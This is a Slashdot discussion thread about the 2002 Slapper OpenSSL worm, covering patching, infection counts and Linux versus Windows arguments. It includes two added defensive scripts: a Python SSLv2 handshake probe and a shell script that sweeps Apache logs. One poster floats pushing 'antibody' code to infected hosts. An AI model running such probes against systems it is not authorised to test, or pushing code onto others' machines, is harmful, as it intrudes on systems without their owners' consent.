Apple Computer, Inc.: The vulnerability described in this report has been addressed by
* Security Update 2002-08-23 for Mac OS X 10.2 (Jaguar), and by
* Security Update 2002-08-02 for Mac OS X 10.1.5.
--
How sleepless is the egg, knowing that which throws the stone forsees the bone.
Re:It's a distro problem, not a linux problem
by
glesga_kiss
·
· Score: 1
Even though I would guess that only a tiny percent of all web servers need SSL
I use SSL for everything, even if it's just streaming my own private collection of mp3 from my web server. E-mail? IMAP over SSL. Remote access? VNC over SSH.
Why would you not want to encrypt everything is beyond me...
Re:It's a distro problem, not a linux problem
by
tialaramex
·
· Score: 2
There's nothing phony about self-certification. Since Verisign and other companies in the CA business don't actually do any useful checks or offer a reliable revocation method, you are just saving everyone involved money. If they /really/ want to be sure you're the real deal they will use out of band methods to verify the fingerprint. Yeah, right.
After all >90% of Windows users went for years without a working CA validation check in their crypto subsystem, so without manually opening and verifying the cert they couldn't tell if it was signed by a real CA anyway.
SSL is provably effective against passive snooping, and has some deterrent value against people with low motivation and minimal resources (e.g. script kiddies) but if you think buying a cheap-ass Verisign cert protects you against black hats then you're just another Voodoo security guy.
Re:It's a distro problem, not a linux problem
by
tshoppa
·
· Score: 2
Why would you not want to encrypt everything is beyond me...
I certainly use it for passwords and anything with any possible financial impact. But I don't see the purpose of doing it for much else.
Maybe it's just a habit I picked up from reading all those crypto books in grade school, but it's well known that the greater the number of intercepts, the easier it'll be for someone to crack a code. Not that I believe those numbers are anything but zero for 128-bit encryption :-)
How to test yourself
by
pbur
·
· Score: 5, Informative
If you were like me and wondered if after the OpenSSL upgrade that you actually patched everything right, you can compile and run this program to find out:
http://cert.uni-stuttgart.de/advisories/openssl-sslv2-master/openssl-sslv2-master.c
It will connect to your HTTPS server and check it. Unfortunately, it won't connect to SSH. It helped me make sure I was patched up at least for apache.
And I have never quite understood why the advisory says to recompile your apps as well. If they are using the Shared Library, where the problem actually exists, then they get the upgrade by default. Now, if you had some static compiles, then sure.
Ok,/. put an extra space in the URL after "openssl-ss". I will make a link URL:
The Link
Re:How to test yourself
by
jooniqzb1tch
·
· Score: 3, Informative
be sure to check your sendmail as well if you're using TLS, possibly stunnel and any other ssl enabled server you run.. (well it does not check ssh). I had patched apache immediately but this tool made me realise I had forgotten about sendmail :)
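The checker linked above (openssl-sslv2-master.c) performs a real SSLv2 handshake and tests whether the server has the fix. What follows is a smaller, added example in Python, not that program and not code from the thread: it builds an SSLv2 CLIENT-HELLO, parses the SERVER-HELLO or ERROR that comes back, and reports only whether the server negotiates SSLv2 at all, which is the protocol path the bug lives in. A server that does not answer SSLv2 cannot be reached through it; a server that does answer is not thereby shown to be vulnerable or patched, and for that you run the real checker. The message layouts and cipher-spec values are from the SSLv2 draft; the function names, the sample SERVER-HELLO bytes and the constants are mine. Because it talks to a raw SSL port it can be pointed at 443, a stunnel port, or an SSL-wrapped IMAP/POP/SMTP port, but not at sendmail's STARTTLS, which needs an SMTP dialogue first.

```python
import os
import socket
import struct
import sys

SSLV2_VERSION = 0x0002
MSG_ERROR, MSG_CLIENT_HELLO, MSG_SERVER_HELLO = 0x00, 0x01, 0x04

# CIPHER-SPEC values (3 bytes each) from the SSLv2 draft, offered in the probe
CIPHER_SPECS = bytes([
    0x01, 0x00, 0x80,  # SSL_CK_RC4_128_WITH_MD5
    0x02, 0x00, 0x80,  # SSL_CK_RC4_128_EXPORT40_WITH_MD5
    0x03, 0x00, 0x80,  # SSL_CK_RC2_128_CBC_WITH_MD5
    0x04, 0x00, 0x80,  # SSL_CK_RC2_128_CBC_EXPORT40_WITH_MD5
    0x05, 0x00, 0x80,  # SSL_CK_IDEA_128_CBC_WITH_MD5
    0x06, 0x00, 0x40,  # SSL_CK_DES_64_CBC_WITH_MD5
    0x07, 0x00, 0xC0,  # SSL_CK_DES_192_EDE3_CBC_WITH_MD5
])


def build_client_hello(challenge: bytes) -> bytes:
    """SSLv2 record carrying CLIENT-HELLO: version, cipher specs, no session id, challenge."""
    if not 16 <= len(challenge) <= 32:
        raise ValueError("SSLv2 CHALLENGE must be 16..32 bytes")
    body = struct.pack("!BHHHH", MSG_CLIENT_HELLO, SSLV2_VERSION,
                       len(CIPHER_SPECS), 0, len(challenge)) + CIPHER_SPECS + challenge
    # 2-byte record header: high bit set = no padding byte, low 15 bits = body length
    return struct.pack("!H", 0x8000 | len(body)) + body


def split_record(data: bytes) -> bytes:
    """Strip the 2- or 3-byte SSLv2 record header and return the message body."""
    if len(data) < 2:
        raise ValueError("short record")
    if data[0] & 0x80:
        length, hdr = ((data[0] & 0x7F) << 8) | data[1], 2
    else:
        length, hdr = ((data[0] & 0x3F) << 8) | data[1], 3  # third byte is padding length
    body = data[hdr:hdr + length]
    if len(body) != length:
        raise ValueError("truncated record")
    return body


def parse_server_reply(body: bytes) -> dict:
    """Decode a SERVER-HELLO (or ERROR) message body into its fields."""
    if not body:
        raise ValueError("empty message")
    if body[0] == MSG_ERROR:
        return {"type": "error", "code": struct.unpack("!H", body[1:3])[0]}
    if body[0] != MSG_SERVER_HELLO:
        raise ValueError("unexpected message type 0x%02x" % body[0])
    sid_hit, cert_type, version, cert_len, specs_len, cid_len = struct.unpack("!BBHHHH", body[1:11])
    off = 11
    cert = body[off:off + cert_len]
    off += cert_len
    specs = body[off:off + specs_len]
    off += specs_len
    return {
        "type": "server_hello",
        "session_id_hit": sid_hit,
        "certificate_type": cert_type,  # 1 = X.509 certificate
        "version": version,
        "certificate_der": cert,
        "cipher_specs": [specs[i:i + 3] for i in range(0, len(specs), 3)],
        "connection_id": body[off:off + cid_len],
    }


def speaks_sslv2(reply: dict) -> bool:
    """True when the server answered CLIENT-HELLO with an SSLv2 SERVER-HELLO."""
    return reply["type"] == "server_hello" and reply["version"] == SSLV2_VERSION


def _recv_exact(sock: socket.socket, n: int) -> bytes:
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("connection closed mid-record")
        buf += chunk
    return buf


def probe(host: str, port: int = 443, timeout: float = 5.0) -> dict:
    """Send CLIENT-HELLO to host:port and return the parsed reply. The only function doing I/O."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_client_hello(os.urandom(16)))
        hdr = _recv_exact(sock, 2)
        if hdr[0] & 0x80:
            length = ((hdr[0] & 0x7F) << 8) | hdr[1]
        else:
            length = ((hdr[0] & 0x3F) << 8) | hdr[1]
            hdr += _recv_exact(sock, 1)
        return parse_server_reply(split_record(hdr + _recv_exact(sock, length)))


# Constructed SERVER-HELLO record (placeholder certificate bytes, two cipher specs,
# 16-byte connection id) so the parser can be exercised without a network.
_CERT, _SPECS, _CID = b"\x30\x03\x02\x01\x01", b"\x01\x00\x80\x07\x00\xC0", b"\x11" * 16
_HELLO_BODY = struct.pack("!BBBHHHH", MSG_SERVER_HELLO, 0, 1, SSLV2_VERSION,
                          len(_CERT), len(_SPECS), len(_CID)) + _CERT + _SPECS + _CID
SAMPLE_SERVER_HELLO = struct.pack("!H", 0x8000 | len(_HELLO_BODY)) + _HELLO_BODY

if __name__ == "__main__":
    host = sys.argv[1]
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 443
    try:
        reply = probe(host, port)
    except (OSError, ValueError) as exc:
        print("%s:%d no SSLv2 SERVER-HELLO (%s)" % (host, port, exc))
    else:
        print("%s:%d %s" % (host, port, "answers SSLv2" if speaks_sslv2(reply) else "refused: %r" % reply))
```

Run it as python3 sslv2probe.py host [port]. The patch-independent mitigation is to stop answering SSLv2 at all, which in mod_ssl is the directive SSLProtocol all -SSLv2; after that this probe should see a closed connection or an ERROR message rather than a SERVER-HELLO, and a worm that has to complete the SSLv2 handshake first has nothing to talk to.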
Re:How to test yourself
by
Anonymous Coward
·
· Score: 0
A static compile compiles the code into the Apache binary. A shared module compile compiles the code into the module, and when the module is needed it is loaded into the Apache binary. The key word here is compile, everything is already compiled from the source. Nothing is ever loaded from the SSL library, over the initial compile.
I can do everything virtually in Linux what I can do in Windows.
There's only little in the field of capturing/encoding divx movies and graphical download managers, but I might be wrong there since I haven't bothered to look.
I also have to give a lecture on the slapper worm in a couple weeks and I haven't really started my presentation notes :(
Wish me LUCK!
Keep your anti virus software up to date also....
by
HeyZuess
·
· Score: 1
I find it somewhat odd that each advisory from an anti-virus vendor concerning the slapper worm advises to not only patch your software, but also keep your antivirus software current.
If the software is patched then antivirus software is irrelevant.
How big is the antivirus software market for linux?
We're not really catching up
by
Anonymous Coward
·
· Score: 5, Insightful
Code Red infected at least 400,000 Microsoft systems. I think it infected 40,000 in the first day. Nimda got something like 65,000 plus. Slapper has infected 7,000 to 11,000, depending upon who you listen to. Now take into consideration that Linux Apache systems host a significantly larger number of web sites than Windows systems do.
Slapper is a minor event. I see a constant stream of Microsoft security alerts go through my mailbox, and you don't hear a peep out of these Microsoft apologists and cheerleaders until a serious Open Source vulnerability occurs once or twice a year.
All complex software will have bugs. It seems to me that Open Source bugs get fixed quicker, and Open Source admins are more inclined to patch in a timely manner than Microsoft ones by at least one order of magnitude. What do you expect from Windows, though, when its target market is people who don't know how to use computers.
Re:We're not really catching up
by
Anonymous Coward
·
· Score: 0, Troll
Since linux only holds about 10% of the market, i would look at this as pretty equal...
"opensource is so great"... get a life. Go find a driver for your video card.
Re:We're not really catching up
by
catfood
·
· Score: 5, Insightful
More importantly, Open Source problems stay visible until they are fixed. There's no hiding behind STO, no stonewalling.
Have you noticed how many pre-emptive security patches are made by Open Source developers? Where the announcements start with "someone pointed out this security flaw, and they were right, and we wanted to fix it before the exploits get created"? The "someone pointed out" part is a big deal. You can't get that with closed source vendorware, not proactively. As a result, security problems are frequently fixed long before they cause any problems at all.
Re:We're not really catching up
by
rindeee
·
· Score: 2, Informative
10% of what market you genius? The sector that matters here is machines with direct connection to the Internet. In that sector, Linux outnumbers Windows boxes by a strong (about 3.5 to 1 according to latest Netcraft stats giving Linux/Apache around 60% market share). Me thinks an "Introduction to Elementary Statistics" is in order my friend.
Re:We're not really catching up
by
Anonymous Coward
·
· Score: 0
> It seems to me that Open Source bugs get fixed quicker, and Open Source admins are more inclined to patch in a timely manner than Microsoft ones by at least one order of magnitude.
The operative word is "seems", but the structure of my sentence may have made my meaning unclear. I am basing my opinion on the fact that Code Red infected 40 times as many systems as Slapper has within the same period of time at a time when ~40% of web sites were hosted on Linux and ~25% were hosted on a Windows platform.
Re:We're not really catching up
by
Anonymous Coward
·
· Score: 0
if you knew what the fuck you were talking about you would know you dont need a video card for youre server. moron
Re:We're not really catching up
by
essdodson
·
· Score: 1
Did you forget that MS patched the bugs exploited by Codered 18 months prior to codered's birth? If you want to place blame, blame the folks running those machines.
-- scott
Re:We're not really catching up
by
micromoog
·
· Score: 2
Upon reading this outrageously unlikely claim, I did a bit of looking. I assume you're getting your numbers from here.
Apache, unsuprisingly, has a large market share, but no mention of OS . . . you're not assuming all of these Apache servers are running on Linux boxes, are you?
Re:We're not really catching up
by
Anonymous Coward
·
· Score: 0
Check out microsoft.public.* on usenet. Just about every Windows admin with a clue is tired of MS's crappy security record.
You have it backwards. Just about every Windows admin with a clue has figured out a way to automate the patch process to make his or her job easier. Where I work, when a new patch comes out, I stick it in an Active Directory GPO created specifically for this purpose so that on the next system bootup, the patch is installed, system is rebooted, and hfnetchk.exe runs to create a log file detailing success/failure. Takes a whole morning to push the patch to ~225 desktops and it wouldn't even take that long if everyone would get to work on time. Then I get to spend the rest of my time posting on /. on how wrong you clueless Linux users are about the state of the Windows world.
Re:We're not really catching up
by
bozone
·
· Score: 1
Just about every Windows admin with a clue is tired of MS's crappy security record
if only the admins were the decision makers instead of the phbs..
-- "Hatred is the coward's revenge for being intimidated"...George Bernard Shaw
Re:We're not really catching up
by
Anonymous Coward
·
· Score: 0
And thanks to posts like this we're beginning to catch up in the field of "Issuing obvious BS in the hope of downplaying a real security vulnerability"
Re:We're not really catching up
by
sehryan
·
· Score: 2
And you know what? A patch was available to MS systems before Code Red starting really moving. I was pushing my administrator to do it. He didn't feel it was necessary. A couple of days later we get hit, and he spends the next days and nights trying to stop the spread and recover.
Code Red exists because of crap MS security. Code Red spread because of crap Administrators.
-- The world moves for love. It kneels before it in awe.
Re:We're not really catching up
by
Anonymous Coward
·
· Score: 0
> Since linux only holds about 10% of the market, i would look at this as pretty equal...
You really don't know what you are talking about. Linux has a share of around 3%. However apache that runs mostly on linux has a share of around 60% on web servers. This bug affects only around 10% of those servers (those that support SSL). Now Microsoft has around 30% among web servers. And it has bugs that affected all 100% of its web servers. Now imagine 6% -> one exploit, 60-6 -> none exploit, 30% -> few exploits. Time frame: one year.
Re:We're not really catching up
by
Anonymous Coward
·
· Score: 0
How can such a moron be modded as Insightful. What does the number of websites have to do with the spread of the virus. There are hosts with one server running thousands of sites. If this guy wasn't an absolute moron he would do the research and find on netcraft that around 50% of all webservers run Windows (whether IIS or Apache). Linux is actually a distant second with around 30%.
Re:We're not really catching up
by
Dalcius
·
· Score: 2
While the parent of your message was not correct (I don't think?), 27% of all servers today ship with Linux. And that doesn't include those that are being converted from Unix / Windows that were already owned.
10%? *bzzt* Try again.
-- ~Dalcius Rome wasn't burnt in a day.
Re:We're not really catching up
by
Anonymous Coward
·
· Score: 0
Slapper is a minor event. I see a constant stream of Microsoft security alerts go through my mailbox, and you don't hear a peep out of these Microsoft apologists and cheerleaders until a serious Open Source vulnerability occurs once or twice a year.
Umm, wrong. Slapper may be a minor event when you compare numbers to other worm infections, but it is a major event when it comes to poking a hole in the myth of Linux/Unix invulnerability. We've all heard too many times how Linux is more secure and how the admins are more knowledgeable and on top of their game while Windows admins tried to argue that things might be different if crackers actually targeted Linux boxen. Well, now apparently someone *is* targeting Linux/Unix servers and that means you're going to have those Windows admins coming back to give the technical equivalent of "neener neener, I told ya so". Just grow up and deal with it and stop making justifications for the sorry admins that allowed this worm to spread after a fix had been made available.
What do you expect from Windows, though, when its target market is people who don't know how to use computers.
What do you expect from Linux, though, when its target market is leetist, smug assholes.
Re:We're not really catching up
by
rindeee
·
· Score: 1
I am not "assuming" anything. Dig a bit deeper my friend and look at the OS platform statistics, not the web server survey. Look at Apache's own platform statistics. Outrageously unlikely? Really?
Re:We're not really catching up
by
Anonymous Coward
·
· Score: 0
Oh, well. Sorry about that then. We would probably be using SUS as well if we didn't already have our own system in place when it was released.
Re:We're not really catching up
by
Anonymous Coward
·
· Score: 0
Apache and Windows are not mutually exclusive. Most webservers are indeed Windows boxes, and a good number of them run Apache. While Apache owns the WebServer market, Linux does not.
10% of what market you genius? The sector that matters here is machines with direct connection to the Internet. In that sector, Linux outnumbers Windows boxes by a strong (about 3.5 to 1 according to latest Netcraft stats giving Linux/Apache around 60% market share). Me thinks an "Introduction to Elementary Statistics" is in order my friend.
I'm assuming you mean Unix/Apache, because Netcraft doesn't list OSs in their survey. The last datum I heard for Linux was around 15% of the server market, with Windoze taking up 30%-35%, and Unix the rest.
Re:We're not really catching up
by
PyroX_Pro
·
· Score: 0
Well, look at that, it found ALL of my hardware right away, I didn't even have to go to any vendor websites to get the drivers. Is this heaven? No fool, its Linux. Its becoming easier and easier to install, unless you use some homemade hardware with parts you bought from radio shack.
When was the last time you did anything without using Microsoft products? That is the better point. Stop waving your flag of corporate America approval for a monopolistic company,
To me, its harder to setup my video card under windows, WTF man, you think windows locates, and installs my GeForce drivers for me? hell no! I have to go out to NVidia's website and locate them.
The worm is attacking SSL, which is connected to Apache, which holds 80% of all your craptastic websites, it is far from equal.
Re:We're not really catching up
by
Anonymous Coward
·
· Score: 0
system is rebooted
Good thing your server is not used much and you can afford to shut it down willy-nilly.
..and you forgot the most important part of the patch process: Pray, and Pray Again.
Re:We're not really catching up
by
micromoog
·
· Score: 2
Show me any legitimate resource that says something remotely close to "60% of all Internet-connected computers run Linux". That was your outrageous claim.
Re:We're not really catching up
by
Anonymous Coward
·
· Score: 0
Dude, where have you been. To get my Nvidia drivers under Gentoo, I just type emerge nvidia-glx and emerge nvidia-kernel. If I install SuSE, it goes out and downloads them for me as well at the click of a button. With Windows, I open a browser and go hunt for the right ones then hope they install properly without my system becoming crippled (Don't laugh. It has happened to me.). Have you even worked on a Linux system?
By the way, tests have shown that the Nvidia drivers for Linux and native Linux games perform better than their Windows counterparts. Why are you clinging to that expensive, unreliable, monolithic, monopolistic dinosaur? Are you one of those "unbiased" Microsoft employees that lurks on Slashdot?
You know, Slashdot was so nice for the first three years before Microsoft users "discovered" it. Now they just moan about people being mean to them. Here's an idea. Start your own version of Slashdot. Why don't you run it on a Windows IIS system. That should be interesting.
Re:We're not really catching up
by
Anonymous Coward
·
· Score: 0
Since we're namecalling, there is an apostrophe in the contraction "you're," if that's what you meant to type. Had you types it correctly, you'd still have misused it.
You're: Contraction for "you are."
Your: Possessive. Conveys ownership.
Example: You're a dolt, incapable of correctly utilizing your own language.
Re:We're not really catching up
by
Anonymous Coward
·
· Score: 0
Two words. Anger Management. Sick Windows box keep you up all night?
Re:We're not really catching up
by
Anonymous Coward
·
· Score: 0
"It seems to me that Open Source bugs get fixed quicker"
Open source patches get released quicker. For commercial software there is usually a rigorous regression testing process that has to be adhered to, no matter how trivial the fix seems.
Re:We're not really catching up
by
Anonymous Coward
·
· Score: 0
Re:We're not really catching up
by
Anonymous Coward
·
· Score: 0
IBM marketing flak with statistics done by IBM is hardly unbiased.
Re:We're not really catching up
by
Anonymous Coward
·
· Score: 0
Okay, so there are 66% more Windows web servers (including desktop systems and some that had a web server installed by default without the owners knowledge) than Linux ones, and the worst Windows worm infected 40 times the number of systems as Slapper.
Also, Linux is more commonly used to host multiple sites than Windows for some reason.
Also, the last attrition.org web site defacement figures I saw (which admittedly was pre-Code Red) showed that well over 50% of defacements were on Windows systems although they had a smaller share of sites at the time than they do now. Now *that* *is* a figure that is directly related to the number of web sites. If you compromise one Linux/Apache server, you should be able to deface several sites, right? If you break into one Windows box, chances are you can only deface one web site, but something like 55-60% of the defacements were on Windows at a time they had much less than 50% share. Why is that?
Now of course the Morris worm was big back in the day, and that was all Unix before there were even many Windows systems on the Internet. Of course, that got fixed. Code Red is still bouncing around the Internet, and Dshield says 10,000 Windows systems are infected even as we speak. What was the last "big" Linux worm? Ramen? Lion? How many Linux systems were infected, and how many still are?
Re:We're not really catching up
by
Anonymous Coward
·
· Score: 0
Had you types it correctly, you'd still have misused it.
Types: Plural, conveys many options
Typed: Past tense, conveys an event in the past
Example: Had you taken the time, and correctly typed your response, you would not have looked like the idiot you are.
Re:We're not really catching up
by
TurdFurgeson
·
· Score: 0
Forest fires don't burn in the desert... If you know what I mean....
Re:We're not really catching up
by
JoFu
·
· Score: 1
I think another point to mention is that the fixes for this vuln were available before I even heard of the worm, which could be another significant reason for the lower amount of infections.
Re:We're not really catching up
by
Anonymous Coward
·
· Score: 0
More importantly, Open Source problems stay visible until they are fixed. There's no hiding behind STO, no stonewalling.
Yeah, no Open Source project would conceal a major bug for months, and continue to make major releases without fixing it, until finally someone forces their hand by posting the details on BugTraq.
Re:We're not really catching up
by
orange7
·
· Score: 1
> Then I get to spend the rest of my time posting on /. on how wrong you clueless Linux users are about the state of the Windows world.
... and rebooting machines.
A.
Re:We're not really catching up
by
Anonymous Coward
·
· Score: 0
You might wanna check your comma usage...;)
now are you two done with your little troll war now?
Re:We're not really catching up
by
cyberdog6
·
· Score: 1
i tried for a weekend to get XP to install drivers for my nVidia GeForce2 on an old Compaq. no deal.
Mandrake, saw it right away.
tried to install it on XP on a new PC i just got, it's a home built box with not the best of the best parts but decent, XP never would install on an NTFS partition. errored out with different errors every time.
i have no idea why, but finally for a laugh i installed it on on a FAT32 partition, and it installed with only a few errors.
Mandrake Linux went on with only one error the very first install on this box and runs perfectly.
you don't need to find drivers with Linux apparently, it finds them. even on a cobbled together box like mine.
if you really want Unix stability and ease of use, along with drivers for everything, there is only one platform...Macintosh baby! If computer platforms are vampires, then Macintosh is the "Blade" of computer platforms.
All of the strengths, none of the weaknesses!
-- Evil is the money of all root....
Re:We're not really catching up
by
catfood
·
· Score: 2
Point taken.
But it was the openness of the source that made it possible for someone to do that forcing. It doesn't matter that 99.99% of users didn't notice the bug and didn't go through the source code to find it. What matters is that one hacker did and was able to isolate it because of the availability of source code.
Questions:
by
Black+Parrot
·
· Score: 2, Interesting
> I find it terribly amusing how for years the open-source community has used the larger number of holes found in Windows systems as one of their arguments against it. Yet now when the open-source community is also plagued with the same thing the comments tend to be along the line of 'Windows still sux.'...
How many Apache exploits per IIS exploit?
What are the average turnaround times for security updates for Apache and IIS?
How much other stuff gets broken by an Apache update and a IIS update?
being a good samaritan. no www prefix so browsers won't auto link it, no http prefix for same reason. please do not convert to hyperlink. digitalsushi.com/chkrootkit.tar.gz will leave up for 24 hours, or when i just cant take the abuse anymore.
-- slashdot: where everyone yells sarcastic metaphors to themselves to understand the issue
Interesting fun fact- almost 45% of you grabbing my mirror are using Windows:D (pssst. you can download from the lunix now, you don't have to download it with the Blue E and then WSFTP it up)
-- slashdot: where everyone yells sarcastic metaphors to themselves to understand the issue
NOTE TO SELF: actually run vulnerability checker programs before posting mirrors to them on a public link to your own web server
-- slashdot: where everyone yells sarcastic metaphors to themselves to understand the issue
Re:mirror
by
Anonymous Coward
·
· Score: 0
Some of us are using linux, but have our browsers report windows. This way we won't get pages saying: "this page requires ie version xxx. please upgrade your browsers to view the content". Some of those people are also downloading to a samba share, then sshing to the box to run the stuff also:). Then I'm part of the other 55% though.
To all those who will no doubt post "see, CodeRed can happen to Linux, too" - here is some enlightenment:
There are currently an estimated 10,000 hosts infected with Slapper (any variant).
According to DShield's CodeRed history page, around 25,000 windos hosts are still estimated as CodeRed infected, one year after the event. According to news.com, at the peak we had over 350,000 infected machines.
10,000 is about 2% of 350,000. No, Slapper is in not even comparable to CodeRed when it comes to spread, neither speed nor coverage.
It does, however, prove two things:
a) The Linux world is susceptible to the same generic diseases
b) For various reasons (more variety, better sysadmins, better security in general), it coped much better with an actual outbreak.
It doesn't prove that much as there may be fewer Apache-SSL sites on linux than there are IIS sites. Code Red hit all IIS boxes, Slapper only hits Apache on linux, and even then, it requires the presence of gcc and some other conditions to be met before it works.
That said, I would like to see a more in-depth analysis of the proportions of machines which have been hit and are infected. Also, we should bear in mind that the impact is much less on linux as Apache normally runs as a non-root user while IIS almost always runs as a system/admin user.
I think the answer is simple, most using Apache know what they're doing and actually care about maintaining their web server. Most using IIS don't know what they're doing, nor do they care (until something like CodeRed happens).
It doesn't prove that much as there may be fewer Apache-SSL sites on linux than there are IIS sites.
It proves even less than that. There are two SSL add-ons for Apache, and only mod_ssl is vulnerable to the current Slapper variants (partly due to the fact it advertises the OpenSSL version). Apache-SSL sites are not presently being hit, but they could be.
It doesn't prove that much as there may be fewer Apache-SSL sites on linux than there are IIS sites. Code Red hit all IIS boxes, Slapper only hits Apache on linux, and even then, it requires the presence of gcc and some other conditions to be met before it works.
You say that like it's a bad thing.
But doesn't that speak to the resilience of the Open Source approach? The fact that you can run an Apache site without enabling or even installing SSL is a strength. AFAIK (and ICBW) you can't do that with IIS.
It shows that CodeReds growth was exponential at the critical time, which measured only a few hours. Days have passed since Slapper hit the 10k mark, and we haven't seen any considerably higher estimates.
Didn't they say code red hit 25,000 in the first day?
I'm all up for being fair, but move on folks, there really is nothing to see here.
-- ~Dalcius Rome wasn't burnt in a day.
Re:comparison
by
Anonymous Coward
·
· Score: 0
Care to back this up with something that you didn't just pull from your ass? No? Well, let me.
According to Netcraft, the estimated number of IIS servers around the time of the Code Red outbreak was around 8 million. The largest number for infected servers that I have seen thrown around is 350,000.
So, 8 million - 350,000 = most IIS admins *do* know what they are doing and they do care.
Re:Where's all the yammering now?
by
Anonymous Coward
·
· Score: 0
Yammer yammer yammer!
No wait! "Developers! Developers! Developers! Developers!" -- Steve "Monkey Boy" Ballmer
Why the F___?
by
Anonymous Coward
·
· Score: 0
Why the F___ is this being called a LINUX worm, when in fact it is an SSL worm?
Let's just hope Taco isn't doing too much sys admin work these days because this is really old news. Slapper was spotted over a week ago and the news appeared on LWN at the URL below.
http://www.lwn.net/Articles/10026/
Thanks.
Re:Old news
by
Anonymous Coward
·
· Score: 0
Idiot, this story is about Slapper.B and Slapper.C, Slashdot ran the original slapper story weeks ago.
My first log entry on my home box (DSL) showing this came up Sep 12... So almost 2 weeks ago.
The entry is as follows: [Thu Sep 12 17:40:09 2002] [error] [client 211.75.133.54] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23):/
I've had a total of about 45 hits in the last 2 weeks, not like nimda at all in that regard (had to nuke my error logs like twice a week instead of once a month).
(BTW, I'm running FreeBSD and no SSL so it's not that big a deal for me.)
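The error_log line quoted in the post above is the kind of thing one can sweep for in bulk. What follows is an added example, not code from the thread, from Slapper, or from any vendor: it counts "request without hostname" errors per client address over an Apache error_log in that format, run here against a constructed sample log. Whether such lines are Slapper's port-80 probe is the poster's attribution; the script only shows which clients keep sending them.

```shell
#!/bin/sh
# Count "request without hostname" errors per client IP in an Apache error_log.
# Hypothetical helper written for this thread (not Slapper's code and not from
# any vendor). It expects the 1.3-era error_log format shown in the post:
#   [date] [error] [client A.B.C.D] client sent HTTP/1.1 request without hostname ...
# Any client that omits the Host: header produces this line, so treat repeated
# sources as candidates for a closer look, not as confirmed infections.

# Usage: hostless_requests_by_client <error_log> [min_hits]
# Prints "count ip" lines, most active first, for clients with >= min_hits (default 1).
hostless_requests_by_client() {
    log="$1"
    min="${2:-1}"
    grep 'request without hostname' "$log" \
      | sed -n 's/.*\[client \([0-9.]*\)\].*/\1/p' \
      | sort | uniq -c | sort -rn \
      | awk -v min="$min" '$1 >= min { print $1, $2 }'
}

# Constructed sample log (not a real capture): one address probing repeatedly,
# one unrelated 404, one single-shot probe from elsewhere.
sample_log() {
    cat <<'EOF'
[Thu Sep 12 17:40:09 2002] [error] [client 211.75.133.54] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /
[Thu Sep 12 17:41:02 2002] [error] [client 10.0.0.7] File does not exist: /var/www/html/favicon.ico
[Thu Sep 12 18:02:11 2002] [error] [client 211.75.133.54] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /
[Thu Sep 12 19:13:45 2002] [error] [client 192.0.2.9] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /
EOF
}

# Run with --demo to see the sample; in practice point it at /var/log/httpd/error_log.
if [ "${1:-}" = "--demo" ]; then
    tmp=$(mktemp)
    sample_log > "$tmp"
    hostless_requests_by_client "$tmp" 2
    rm -f "$tmp"
fi
```

Feed it the real log with a threshold of two or three to separate scanners from a stray misconfigured proxy; the same sed pattern also works on rotated logs concatenated with cat.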
Re:Old news
by
Anonymous Coward
·
· Score: 0
Good thing you're not doing the news. This problem was addressed and patched over a month ago. While partly right with "over a week ago", it would be more correct to say "over a month ago"... helps make things seem... more right.
A Linux worm that started spreading a week ago has reached a plateau after infecting about 7,000 servers and turning the hosts into a peer-to-peer network that could be used to attack other computers.
Known as Linux.Slapper.Worm, Slapper and Apache/mod_ssl, the worm's spread has fallen far short of the biggest attackers in recent times. For example, Code Red infected 400,000 servers last summer. And according to the National Strategy to Secure Cyberspace, the Nimda virus compromised 86,000 systems last fall.
If these "new" worms exploit the same hole in OpenSSL, wouldn't one expect them to have a similarly low plateau? And for the record, exactly what configurations are vulnerable? If you have Apache compiled with mod_ssl, but don't do "apachectl startssl", are you vulnerable?
-- rooooar
Re:But...
by
Anonymous Coward
·
· Score: 0
Apache runs on almost any platform. I've installed Apache on a Windows XP machine just to see if it worked. Worked fine. Does that mean that Windows is also vulnerable to this problem, or does SSL with Apache only work on linux? If it works in Windows and infects Apache/SSL on windows... it would be more correct to title the article "New SSL Worm Found In The Wild".
Of course, from what I hear, the worm spreads by recompiling itself with gcc... which windows will just tell you "Bad command or file name"
Finally - Linux can be utilized as a Desktop OS!
by
Anonymous Coward
·
· Score: 0
No kidding! I was so glad to see that we get virii and worms, too. I mean, seriously. I was getting so tired of hearing my co-workers say "Hey, I've got the latest variation of the KleZ virus." "Oh yeah? Code red is still eating me alive!" As I just meekly stir my Dr. Pepper and saunter off...
Not anymore! I TOO am infected! HAHAHA!!! We can at last fully compete with the desktop market!
Oh wait... I guess it's a webserver virus, huh? Crap. Better luck next time, I guess.
Mod parent up! He/she may be right!
by
Anonymous Coward
·
· Score: 0
Welcome to the world of Microsoft
by
Anonymous Coward
·
· Score: 0
Got to love the buffer overflow... I will just laugh quietly while you patch your machines as you have done to me many times with iis...
Re:Welcome to the world of Microsoft
by
linuxrochester
·
· Score: 0
I hate Microsoft and especially IIS, but if I was an IIS admin, I would be lovin' this. Enjoy it while it lasts.:)
"Wget"ing its source
by
N+Monkey
·
· Score: 5, Interesting
From the article:
According to researchers at F-Secure, the Slapper.B worm variant is able to retrieve its source code from a Web page after the worm has been removed from infected servers. The worm uses a common free software utility, wget, to retrieve its source code from an infected Web page in the home.ro domain.
Administrators of the domain, which is located in Romania, have been notified and the infected page has been deleted from the site, according to F-Secure.
Rather than simply having deleted the page, I wonder if it would have been possible to replace this source code with something else that acted as an "antibody"?
Re:"Wget"ing its source
by
bytesmythe
·
· Score: 3, Funny
For maximum benefit, the code should be something like:
ifdown eth0
-- bytesmythe Hypocrisy is the resin that holds the plywood of society together. -- Scott Meyer
Re:"Wget"ing its source
by
glesga_kiss
·
· Score: 1
Rather than simply having deleted the page, I wonder if it would have possible to replace this source code with something else that acted as an "antibody"?
It would probably be illegal to do that as well. You are still running code and accessing someone else's machine without their consent.
If it were to do any damage to the system (easy if it were a non-standard setup), the poster of the antibody code would be liable.
Re:"Wget"ing its source
by
Anonymous Coward
·
· Score: 0
For example,
#include <unistd.h>
int main(void) {
    /* execlp() needs argv[0] and a NULL terminator; it only returns on failure */
    execlp("apt-get", "apt-get", "update", (char *)NULL);
    return 1; }
